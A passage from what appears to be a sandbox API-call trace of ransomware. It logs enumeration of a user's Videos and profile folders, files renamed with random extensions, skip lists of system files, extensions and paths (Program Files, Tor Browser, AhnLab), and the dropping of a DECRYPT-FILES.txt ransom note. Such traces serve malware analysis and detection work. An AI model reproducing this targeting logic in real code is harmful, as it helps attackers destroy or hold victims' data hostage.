(lpString1="tBOJG0lIg.flv.b5kZV", lpString2="thumbs.db") returned -1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="Bootfont.bin") returned 1 [0186.257] lstrlenW (lpString="tBOJG0lIg.flv.b5kZV") returned 19 [0186.257] lstrcmpiW (lpString1="b5kZV", lpString2="lnk") returned -1 [0186.257] lstrcmpiW (lpString1="b5kZV", lpString2="exe") returned -1 [0186.257] lstrcmpiW (lpString1="b5kZV", lpString2="sys") returned -1 [0186.257] lstrcmpiW (lpString1="b5kZV", lpString2="dll") returned -1 [0186.257] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.257] lstrlenW (lpString="tBOJG0lIg.flv.b5kZV") returned 19 [0186.257] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="tBOJG0lIg.flv.b5kZV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv.b5kZV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv.b5kZV" [0186.257] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv.b5kZV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tbojg0lig.flv.b5kzv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.258] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=12580) returned 1 [0186.258] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.258] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.258] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.258] CloseHandle (hObject=0x260) returned 1 [0186.259] CloseHandle (hObject=0x25c) returned 1 [0186.259] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.259] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e51f1f0, ftCreationTime.dwHighDateTime=0x1d4d45e, ftLastAccessTime.dwLowDateTime=0x1a8944e0, ftLastAccessTime.dwHighDateTime=0x1d4d0c7, ftLastWriteTime.dwLowDateTime=0xb089e640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb581, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TfA5dyz.avi.Ab99y", cAlternateFileName="TFA5DY~1.AB9")) returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="DECRYPT-FILES.txt") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="autorun.inf") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="boot.ini") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="desktop.ini") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="ntuser.dat") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="iconcache.db") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="bootsect.bak") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="ntuser.dat.log") returned 1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="thumbs.db") returned -1 [0186.259] lstrcmpiW (lpString1="TfA5dyz.avi.Ab99y", lpString2="Bootfont.bin") returned 1 [0186.259] lstrlenW (lpString="TfA5dyz.avi.Ab99y") returned 17 [0186.259] lstrcmpiW (lpString1="Ab99y", lpString2="lnk") returned -1 [0186.259] lstrcmpiW (lpString1="Ab99y", lpString2="exe") returned -1 [0186.259] lstrcmpiW (lpString1="Ab99y", lpString2="sys") returned -1 [0186.259] lstrcmpiW (lpString1="Ab99y", lpString2="dll") returned -1 [0186.259] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.259] lstrlenW (lpString="TfA5dyz.avi.Ab99y") returned 17 [0186.259] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.259] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="TfA5dyz.avi.Ab99y" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi.Ab99y") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi.Ab99y" [0186.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi.Ab99y" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tfa5dyz.avi.ab99y"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.260] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=46465) returned 1 [0186.260] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.260] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.261] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.261] CloseHandle (hObject=0x260) returned 1 [0186.261] CloseHandle (hObject=0x25c) returned 1 [0186.261] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.261] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd441ba30, ftCreationTime.dwHighDateTime=0x1d4d116, ftLastAccessTime.dwLowDateTime=0x58073030, ftLastAccessTime.dwHighDateTime=0x1d4cb08, ftLastWriteTime.dwLowDateTime=0xb08ea900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8f93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voRYC1W8ZezIZ1pk.swf.DdjunyD", cAlternateFileName="VORYC1~1.DDJ")) returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="DECRYPT-FILES.txt") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="autorun.inf") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="boot.ini") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="desktop.ini") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="ntuser.dat") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="iconcache.db") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="bootsect.bak") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="ntuser.dat.log") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="thumbs.db") returned 1 [0186.261] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf.DdjunyD", lpString2="Bootfont.bin") returned 1 [0186.261] lstrlenW (lpString="voRYC1W8ZezIZ1pk.swf.DdjunyD") returned 28 [0186.261] lstrcmpiW (lpString1="DdjunyD", lpString2="lnk") returned -1 [0186.261] lstrcmpiW (lpString1="DdjunyD", lpString2="exe") returned -1 [0186.261] lstrcmpiW (lpString1="DdjunyD", lpString2="sys") returned -1 [0186.261] lstrcmpiW (lpString1="DdjunyD", lpString2="dll") returned -1 [0186.261] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.261] lstrlenW (lpString="voRYC1W8ZezIZ1pk.swf.DdjunyD") returned 28 [0186.261] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.262] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="voRYC1W8ZezIZ1pk.swf.DdjunyD" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf.DdjunyD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf.DdjunyD" [0186.262] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf.DdjunyD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\voryc1w8zeziz1pk.swf.ddjunyd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.262] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=36755) returned 1 [0186.262] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.262] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.263] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.263] CloseHandle (hObject=0x260) returned 1 [0186.263] CloseHandle (hObject=0x25c) returned 1 [0186.263] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.263] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdde0620, ftCreationTime.dwHighDateTime=0x1d4ccff, ftLastAccessTime.dwLowDateTime=0xd188e190, ftLastAccessTime.dwHighDateTime=0x1d4d320, ftLastWriteTime.dwLowDateTime=0xb0910a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18f62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xMpLxLM2esbvdeLtC.mp4.EIv0", cAlternateFileName="XMPLXL~1.EIV")) returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="DECRYPT-FILES.txt") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="autorun.inf") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="boot.ini") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="desktop.ini") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="ntuser.dat") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="iconcache.db") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="bootsect.bak") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="ntuser.dat.log") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="thumbs.db") returned 1 [0186.263] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4.EIv0", lpString2="Bootfont.bin") returned 1 [0186.264] lstrlenW (lpString="xMpLxLM2esbvdeLtC.mp4.EIv0") returned 26 [0186.264] lstrcmpiW (lpString1="EIv0", lpString2="lnk") returned -1 [0186.264] lstrcmpiW (lpString1="EIv0", lpString2="exe") returned -1 [0186.264] lstrcmpiW (lpString1="EIv0", lpString2="sys") returned -1 [0186.264] lstrcmpiW (lpString1="EIv0", lpString2="dll") returned 1 [0186.264] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.264] lstrlenW (lpString="xMpLxLM2esbvdeLtC.mp4.EIv0") returned 26 [0186.264] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.264] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="xMpLxLM2esbvdeLtC.mp4.EIv0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4.EIv0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4.EIv0" [0186.264] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4.EIv0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xmplxlm2esbvdeltc.mp4.eiv0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.264] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=102242) returned 1 [0186.264] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.264] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.265] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.265] CloseHandle (hObject=0x260) returned 1 [0186.265] CloseHandle (hObject=0x25c) returned 1 [0186.265] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.265] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe086d690, ftCreationTime.dwHighDateTime=0x1d4c8a1, ftLastAccessTime.dwLowDateTime=0x59e45d10, ftLastAccessTime.dwHighDateTime=0x1d4cca7, ftLastWriteTime.dwLowDateTime=0xb095cd20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x134f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_EoDt9ig1S-.swf.c9XR", cAlternateFileName="_EODT9~1.C9X")) returned 1 [0186.265] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="DECRYPT-FILES.txt") returned -1 [0186.265] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="autorun.inf") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="boot.ini") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="desktop.ini") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="ntuser.dat") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="iconcache.db") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="bootsect.bak") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="ntuser.dat.log") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="thumbs.db") returned -1 [0186.266] lstrcmpiW (lpString1="_EoDt9ig1S-.swf.c9XR", lpString2="Bootfont.bin") returned -1 [0186.266] lstrlenW (lpString="_EoDt9ig1S-.swf.c9XR") returned 20 [0186.266] lstrcmpiW (lpString1="c9XR", lpString2="lnk") returned -1 [0186.266] lstrcmpiW (lpString1="c9XR", lpString2="exe") returned -1 [0186.266] lstrcmpiW (lpString1="c9XR", lpString2="sys") returned -1 [0186.266] lstrcmpiW (lpString1="c9XR", lpString2="dll") returned -1 [0186.266] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.266] lstrlenW (lpString="_EoDt9ig1S-.swf.c9XR") returned 20 [0186.266] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.266] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="_EoDt9ig1S-.swf.c9XR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf.c9XR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf.c9XR" [0186.266] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf.c9XR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_eodt9ig1s-.swf.c9xr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.266] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=79092) returned 1 [0186.267] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.267] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.267] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.267] CloseHandle (hObject=0x260) returned 1 [0186.267] CloseHandle (hObject=0x25c) returned 1 [0186.267] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.268] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe086d690, ftCreationTime.dwHighDateTime=0x1d4c8a1, ftLastAccessTime.dwLowDateTime=0x59e45d10, ftLastAccessTime.dwHighDateTime=0x1d4cca7, ftLastWriteTime.dwLowDateTime=0xb095cd20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x134f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_EoDt9ig1S-.swf.c9XR", cAlternateFileName="_EODT9~1.C9X")) returned 0 [0186.268] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.268] CloseHandle (hObject=0x254) returned 1 [0186.268] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf126daa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf126daa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos\\", cAlternateFileName="")) returned 0 [0186.268] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0186.268] CloseHandle (hObject=0x24c) returned 1 [0186.268] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0186.268] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0186.268] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0186.268] lstrcatW (in: lpString1="All Users", lpString2="\\" | out: lpString1="All Users\\") returned="All Users\\" [0186.268] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0186.268] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Program Files") returned 0x0 [0186.268] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch=":\\Windows") returned 0x0 [0186.268] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Games\\") returned 0x0 [0186.268] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.268] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.268] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="\\All Users") returned="\\All Users\\" [0186.269] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.269] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.269] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0186.269] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0186.269] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0186.269] lstrcatW (in: lpString1="Default", lpString2="\\" | out: lpString1="Default\\") returned="Default\\" [0186.269] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Program Files") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch=":\\Windows") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Games\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\All Users") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="AhnLab") returned 0x0 [0186.269] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.269] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.269] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.269] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\\\0a16c9.tmp") returned 28 [0186.269] CreateFileW (lpFileName="C:\\Users\\Default\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.270] GetLastError () returned 0x5 [0186.270] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.270] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.270] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\\\DECRYPT-FILES.txt") returned 35 [0186.270] CreateFileW (lpFileName="C:\\Users\\Default\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.270] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0186.270] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0186.270] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, 